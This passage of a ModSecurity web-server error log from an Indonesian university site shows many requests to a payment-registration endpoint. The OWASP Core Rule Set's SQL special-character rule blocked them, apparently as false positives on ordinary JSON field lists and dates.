[\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNcCo-f0AAPjincIAAAAF"]
[Tue Aug 29 09:38:46.052085 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNsCo-f0AAPjincMAAAAF"]
[Tue Aug 29 09:38:46.227975 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNsCo-f0AAPjincQAAAAF"]
[Tue Aug 29 09:38:46.403143 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNsCo-f0AAPjincUAAAAF"]
[Tue Aug 29 09:38:46.636284 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNsCo-f0AAPjincYAAAAF"]
[Tue Aug 29 09:38:59.863608 2023] [:error] [pid 63488] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1aQ8Co-f0AAPgAvuEAAAAH"]
[Tue Aug 29 09:38:59.863719 2023] [:error] [pid 63488] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1aQ8Co-f0AAPgAvuEAAAAH"]
[Tue Aug 29 09:39:01.759853 2023] [:error] [pid 63694] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:tglkuitansi. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS:tglkuitansi: 2023-08-29T00:00:00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/save"] [unique_id "ZO1aRcCo-f0AAPjO7gQAAAAp"]
[Tue Aug 29 09:40:22.188211 2023] [:error] [pid 63715] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:tglkuitansi. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS:tglkuitansi: 2023-08-29T00:00:00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/save"] [unique_id "ZO1alsCo-f0AAPjjG1cAAAAG"]
[Tue Aug 29 09:40:23.796826 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1al8Co-f0AAPjIfiIAAAAj"]
[Tue Aug 29 09:40:23.912215 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1al8Co-f0AAPjIfiMAAAAj"]
[Tue Aug 29 09:40:24.403367 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1amMCo-f0AAPjIfiQAAAAj"]
[Tue Aug 29 09:40:25.271460 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1amcCo-f0AAPjIfiUAAAAj"]
[Tue Aug 29 09:40:25.767934 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1amcCo-f0AAPjIfiYAAAAj"]
[Tue Aug 29 09:40:26.078292 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1amsCo-f0AAPjIficAAAAj"]
[Tue Aug 29 09:40:26.399436 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1amsCo-f0AAPjIfigAAAAj"]
[Tue Aug 29 09:40:26.687569 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1amsCo-f0AAPjIfikAAAAj"]
[Tue Aug 29 09:40:26.879159 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1amsCo-f0AAPjIfioAAAAj"]
[Tue Aug 29 09:40:27.060667 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1am8Co-f0AAPjIfisAAAAj"]
[Tue Aug 29 09:40:27.246883 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1am8Co-f0AAPjIfiwAAAAj"]
[Tue Aug 29 09:40:27.431507 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1am8Co-f0AAPjIfi0AAAAj"]
[Tue Aug 29 09:40:27.615460 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1am8Co-f0AAPjIfi4AAAAj"]
